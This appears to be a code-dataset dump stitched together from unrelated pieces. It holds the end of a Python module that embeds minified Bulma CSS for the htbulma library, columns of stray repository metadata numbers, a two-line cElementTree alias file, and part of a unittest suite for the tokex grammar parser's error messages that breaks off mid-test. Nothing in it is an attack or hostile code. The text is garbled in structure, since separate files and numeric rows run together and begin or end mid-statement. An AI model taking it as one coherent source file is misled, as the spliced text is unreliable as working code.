.tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3298dc}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#159dc6 0,#3298dc 71%,#4389e5 100%)}@media screen and (max-width:768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#159dc6 0,#3298dc 71%,#4389e5 100%)}}.hero.is-success{background-color:#48c774;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:rgba(255,255,255,.9)}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-success .navbar-menu{background-color:#48c774}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:rgba(255,255,255,.7)}.hero.is-success .navbar-link.is-active,.hero.is-success .navbar-link:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success a.navbar-item:hover{background-color:#3abb67;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c774}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b342 0,#48c774 71%,#56d296 100%)}@media screen and (max-width:768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b342 0,#48c774 71%,#56d296 100%)}}.hero.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:rgba(0,0,0,.7)}.hero.is-warning .subtitle{color:rgba(0,0,0,.9)}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-warning .navbar-menu{background-color:#ffdd57}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:rgba(0,0,0,.7)}.hero.is-warning .navbar-link.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.hero.is-warning .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle a{color:rgba(0,0,0,.7)}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#ffdd57}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffaf24 0,#ffdd57 71%,#fffa70 100%)}@media screen and (max-width:768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffaf24 0,#ffdd57 71%,#fffa70 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:rgba(255,255,255,.9)}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:rgba(255,255,255,.7)}.hero.is-danger .navbar-link.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger a.navbar-item:hover{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}@media screen and (max-width:768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width:769px),print{.hero.is-medium .hero-body{padding:9rem 1.5rem}}@media screen and (min-width:769px),print{.hero.is-large .hero-body{padding:18rem 1.5rem}}.hero.is-fullheight .hero-body,.hero.is-fullheight-with-navbar .hero-body,.hero.is-halfheight .hero-body{align-items:center;display:flex}.hero.is-fullheight .hero-body>.container,.hero.is-fullheight-with-navbar .hero-body>.container,.hero.is-halfheight .hero-body>.container{flex-grow:1;flex-shrink:1}.hero.is-halfheight{min-height:50vh}.hero.is-fullheight{min-height:100vh}.hero-video{overflow:hidden}.hero-video video{left:50%;min-height:100%;min-width:100%;position:absolute;top:50%;transform:translate3d(-50%,-50%,0)}.hero-video.is-transparent{opacity:.3}@media screen and (max-width:768px){.hero-video{display:none}}.hero-buttons{margin-top:1.5rem}@media screen and (max-width:768px){.hero-buttons .button{display:flex}.hero-buttons .button:not(:last-child){margin-bottom:.75rem}}@media screen and (min-width:769px),print{.hero-buttons{display:flex;justify-content:center}.hero-buttons .button:not(:last-child){margin-right:1.5rem}}.hero-foot,.hero-head{flex-grow:0;flex-shrink:0}.hero-body{flex-grow:1;flex-shrink:0;padding:3rem 1.5rem}.section{padding:3rem 1.5rem}@media screen and (min-width:1024px){.section.is-medium{padding:9rem 1.5rem}.section.is-large{padding:18rem 1.5rem}}.footer{background-color:#fafafa;padding:3rem 1.5rem 6rem}""")
class TagBulma(Tag):
statics = [Tag.H.meta(_name="version",_content=f"htbulma {__version__}"),css]
def classEnsure(self, klass):
""" helper to ensure the 'klass' is set in @class """
if not self["class"]:
self["class"] = klass
else:
#TODO: not terrible, could do better here ;-)
for i in klass.strip().split(" "):
if i not in self["class"]:
self["class"] += " "+i
def _test(*o):
from htag.runners import PyWebWiew,BrowserHTTP
class _BodyTest(Tag.body):
tag="body"
statics=[Tag.H.style("html,body {width:100%;height:100%}")]
def init(self):
self["style"]="border:1px dotted red"
self <= o
BrowserHTTP( _BodyTest ).run()
########################################
from .bases import Content, Button, A, Progress
from .containers import Box,VBox,HBox, Section
from .fields import Fields
from .form import Form
from .inputs import Input,Range,Checkbox,Radio,SelectButtons,TabsHeader,Select,Textarea
from .splitters import HSplit,VSplit
from .services import MBox,Toaster,PopMenu,Clipboard
from .nav import Nav
from .table import Table
from .tabs import Tabs
from .tags import Tags
from .fileselect import FileSelect
from .fileupload import FileUpload
########################################
ALL = Content, Button, A, Progress, Box,VBox,HBox, Section, Fields, Form, Input,Range,Checkbox,Radio,SelectButtons,TabsHeader,Select,Textarea, HSplit,VSplit, MBox,Toaster,PopMenu,Clipboard, Nav, Table, Tabs, Tags, FileSelect, FileUpload
| 3,174.483871
| 194,776
| 0.782449
| 32,527
| 196,818
| 4.734067
| 0.023058
| 0.048122
| 0.022911
| 0.019651
| 0.770556
| 0.684865
| 0.601409
| 0.505225
| 0.388966
| 0.266565
| 0
| 0.052856
| 0.019795
| 196,818
| 61
| 194,777
| 3,226.52459
| 0.745317
| 0.001621
| 0
| 0
| 0
| 0.028571
| 0.992978
| 0.904187
| 0
| 0
| 0
| 0.016393
| 0
| 1
| 0.085714
| false
| 0
| 0.457143
| 0
| 0.685714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21b6f158c7f38371e55cbc75849371c9f6745c80
| 85
|
py
|
Python
|
runtime/python/Lib/xml/etree/cElementTree.py
|
hwaipy/InteractionFreeNode
|
88642b68430f57b028fd0f276a5709f89279e30d
|
[
"MIT"
] | 207
|
2018-10-01T08:53:01.000Z
|
2022-03-14T12:15:54.000Z
|
lib/assets/Lib/xml/etree/cElementTree.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 30
|
2019-01-04T10:14:56.000Z
|
2020-10-12T14:00:31.000Z
|
lib/assets/Lib/xml/etree/cElementTree.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 76
|
2020-03-16T01:47:46.000Z
|
2022-03-21T16:37:07.000Z
|
# Deprecated alias for xml.etree.ElementTree
from xml.etree.ElementTree import *
| 21.25
| 45
| 0.776471
| 11
| 85
| 6
| 0.727273
| 0.242424
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 85
| 3
| 46
| 28.333333
| 0.916667
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21bc8bb707236e73eb0913dedf03d835f5fbb38a
| 36,870
|
py
|
Python
|
test/test_errors.py
|
warrenspe/tokex
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | 1
|
2020-11-10T13:43:35.000Z
|
2020-11-10T13:43:35.000Z
|
test/test_errors.py
|
warrenspe/SParse
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | 11
|
2020-09-10T03:37:24.000Z
|
2020-09-19T04:57:13.000Z
|
test/test_errors.py
|
warrenspe/SParse
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | null | null | null |
import re
import textwrap
import _test_case
from tokex.grammar.parse import tokenize_grammar, construct_grammar
from tokex.grammar import elements
from tokex.grammar import flags
from tokex import errors
from tokex import functions
class TestErrors(_test_case.TokexTestCase):
""" Class which tests the construction of a Tokex grammar from a grammar string """
maxDiff = 1500
gsec_line_col_re = re.compile("Line (\d+) Column (\d+)")
gsec_caret_line_re = re.compile(r"^ *\^+$")
def _parse_gsec(self, gsec):
""" Parses a grammar-string-error-context string """
lines = [line for line in gsec.split("\n") if line.strip()]
line_col_re_match = self.gsec_line_col_re.search(lines[0])
line = int(line_col_re_match.group(1))
column = int(line_col_re_match.group(2))
# Ensure the right amount of caret padding is present
self.assertEqual(lines[2].count(" "), column - 1)
num_carets = lines[2].count("^")
return {
"line": line,
"column": column,
"grammar_snippet": lines[1].lstrip(),
"num_carets": num_carets
}
def _parse_grammar_parsing_error_string(self, grammar_parsing_error):
gpe_str = str(grammar_parsing_error)
lines = gpe_str.split("\n")
intro_and_err_msg = lines[0]
err_msg = intro_and_err_msg.split(": ", 1)[1]
gsec_info = {}
current_line = 1
if self.gsec_line_col_re.search(gpe_str):
for line_idx, line in enumerate(lines[1:], start=current_line):
if self.gsec_caret_line_re.match(line):
break
else:
raise Exception("Caret line not found despite gsec apparently present")
gsec_info = self._parse_gsec("\n".join(lines[1: line_idx + 1]))
current_line = line_idx + 1
tree_info = {}
# If we have something else, it is the grammar tree
if len(lines) > current_line:
tree_info["grammar_tree"] = []
tree_info["tree_type"] = lines[current_line].split(" ", 1)[0]
for line in lines[current_line + 1: len(lines)]:
tree_info["grammar_tree"].append([line.count(" "), line.lstrip()])
return {
"err_msg": err_msg,
**gsec_info,
**tree_info
}
def get_exception(self, grammar_string, exception_type, allow_sub_grammar_definitions=True):
with self.assertRaises(exception_type) as cm:
functions.compile(grammar_string, allow_sub_grammar_definitions=allow_sub_grammar_definitions)
return cm.exception
def test_tokex_error_grammar_string_error_context(self):
# Test an error in the middle of a grammar
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 4,
"column": 3,
"grammar_snippet": "$ error $",
"num_carets": 5
}
)
# Test a grammar with an immediate error
grammar_string = textwrap.dedent('''error $ "test" "test" "test" ''')
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 1,
"column": 1,
"grammar_snippet": 'error $ "test" "test" "test" ',
"num_carets": 5
}
)
# Test a grammar with an error on a long line
grammar_string = textwrap.dedent('''
"1234567890 1234567890 1234567890 1234567890 1234567890 1234567890" error "1234567890 1234567890 1234567890 1234567890 1234567890 1234567890"
''')
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 2,
"column": 51,
"grammar_snippet": '7890 1234567890 1234567890 1234567890 1234567890" error "1234567890 1234567890 1234567890 1234567890 1234',
"num_carets": 5
}
)
def test_grammar_tokenizing_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error_thrown $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.TokexError)
self.assertIn("tokenizing", str(e))
self.assertIn("error_thrown", str(e))
def test_unknown_grammar_token_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error_thrown $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.UnknownGrammarTokenError)
self.assertIn("Encountered unknown grammar token: error_thrown", str(e))
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 4,
"column": 3,
"grammar_snippet": '$ error_thrown $',
"num_carets": 12
}
)
def test_grammar_parsing_error(self):
# Test an error with full tree/context
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ i. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.GrammarParsingError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flag i given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": '$ i. $',
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 2
})
# Test an error with no grammar tree
grammar_string = textwrap.dedent("""
)
""")
e = self.get_exception(grammar_string, errors.GrammarParsingError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 2,
"column": 1,
"grammar_snippet": ")",
"num_carets": 1
})
# Test an error with no error context
e = errors.GrammarParsingError("Test error message")
e.grammar_string = "'test' #"
e.match_span_start = 7
e.match_span_end = 8
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Test error message",
"line": 1,
"column": 8,
"grammar_snippet": "'test' #",
"num_carets": 1
})
# Test an error with no grammar tree nor error context
e = errors.GrammarParsingError("Test error message")
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Test error message"
})
def test_invalid_grammar_token_flags_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ !. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flag ! given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": "$ !. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 2
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ !i. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flags !, i given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": "$ !i. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 3
})
def test_invalid_regex_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ ~[)~ $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidRegexError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid regular expression given: [)",
"line": 4,
"column": 3,
"grammar_snippet": "$ ~[)~ $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 4
})
def test_mutually_exclusive_grammar_tokens_flags_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ si. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.MutuallyExclusiveGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mutually exclusive flags given to <[Any String .]>: i, s",
"line": 4,
"column": 3,
"grammar_snippet": "$ si. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 3
})
def test_invalid_delimiter_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
<test: sep { . }>
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Cannot add iterator delimiters to <[Named Element <test: ...>]>",
"line": 4,
"column": 8,
"grammar_snippet": "<test: sep { . }>",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Named Element <test: ...>]>']
],
"num_carets": 5
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
(test: sep { . })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Cannot add iterator delimiters to <[Named Section (test: ...)]>",
"line": 4,
"column": 8,
"grammar_snippet": "(test: sep { . })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Named Section (test: ...)]>']
],
"num_carets": 5
})
def test_duplicate_delimiter_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
*(test: sep { . } sep { $ })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.DuplicateDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Multiple iterator delimiters defined for <[Zero or More *(test: ...)]>",
"line": 4,
"column": 19,
"grammar_snippet": "*(test: sep { . } sep { $ })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Zero or More *(test: ...)]>'],
[1, '<[Iterator Delimiter sep {...}]>'],
[2, '<[Any String .]>']
],
"num_carets": 5
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
*(test: sep { . } 'test' sep { $ })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.DuplicateDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Multiple iterator delimiters defined for <[Zero or More *(test: ...)]>",
"line": 4,
"column": 26,
"grammar_snippet": "*(test: sep { . } 'test' sep { $ })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Zero or More *(test: ...)]>'],
[1, '<[String Literal test]>'],
[1, '<[Iterator Delimiter sep {...}]>'],
[2, '<[Any String .]>']
],
"num_carets": 5
})
def test_extra_closing_brackets_error(self):
grammar_string = textwrap.dedent("""
'test' )
""")
e = self.get_exception(grammar_string, errors.ExtraClosingBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 2,
"column": 8,
"grammar_snippet": "'test' )",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>']
],
"num_carets": 1
})
grammar_string = textwrap.dedent(")")
e = self.get_exception(grammar_string, errors.ExtraClosingBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 1,
"column": 1,
"grammar_snippet": ")",
"num_carets": 1
})
def test_extra_opening_brackets_error(self):
grammar_string = textwrap.dedent("{")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[One of Set {...}]> was not closed",
"line": 1,
"column": 1,
"grammar_snippet": "{",
"num_carets": 1,
"grammar_tree": [
[0, '<[One of Set {...}]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("*(a:")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[Zero or More *(a: ...)]> was not closed",
"line": 1,
"column": 1,
"grammar_snippet": "*(a:",
"num_carets": 4,
"grammar_tree": [
[0, '<[Zero or More *(a: ...)]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("(section:")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[Named Section (section: ...)]> was not closed",
"line": 1,
"column": 1,
"grammar_snippet": "(section:",
"num_carets": 9,
"grammar_tree": [
[0, '<[Named Section (section: ...)]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("+(abc: 'test' ) <test:")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[Named Element <test: ...>]> was not closed",
"line": 1,
"column": 17,
"grammar_snippet": "+(abc: 'test' ) <test:",
"num_carets": 6,
"grammar_tree": [
[0, '<[One or More +(abc: ...)]>'],
[1, '<[String Literal test]>'],
[0, '<[Named Element <test: ...>]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' ?( 'test'")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[Zero or One ?(...)]> was not closed",
"line": 1,
"column": 8,
"grammar_snippet": "'test' ?( 'test'",
"num_carets": 2,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[Zero or One ?(...)]>'],
[1, '<[String Literal test]>'],
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' +(a:")
e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra opening brackets given; <[One or More +(a: ...)]> was not closed",
"line": 1,
"column": 8,
"grammar_snippet": "'test' +(a:",
"num_carets": 4,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One or More +(a: ...)]>'],
],
"tree_type": "Element"
})
def test_mismatched_brackets_error(self):
grammar_string = textwrap.dedent("'test' { . )")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[One of Set {...}]>",
"line": 1,
"column": 12,
"grammar_snippet": "'test' { . )",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One of Set {...}]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' { . >")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[One of Set {...}]>",
"line": 1,
"column": 12,
"grammar_snippet": "'test' { . >",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One of Set {...}]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' { . >")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[One of Set {...}]>",
"line": 1,
"column": 12,
"grammar_snippet": "'test' { . >",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One of Set {...}]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' { . > $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[One of Set {...}]>",
"line": 1,
"column": 12,
"grammar_snippet": "'test' { . > $",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One of Set {...}]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' *(a: . > $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[Zero or More *(a: ...)]>",
"line": 1,
"column": 15,
"grammar_snippet": "'test' *(a: . > $",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[Zero or More *(a: ...)]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' +(a: . } $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: }, expecting closing brackets for: <[One or More +(a: ...)]>",
"line": 1,
"column": 15,
"grammar_snippet": "'test' +(a: . } $",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[One or More +(a: ...)]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' <a: . } $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: }, expecting closing brackets for: <[Named Element <a: ...>]>",
"line": 1,
"column": 14,
"grammar_snippet": "'test' <a: . } $",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[Named Element <a: ...>]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("'test' <a: . ) $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[Named Element <a: ...>]>",
"line": 1,
"column": 14,
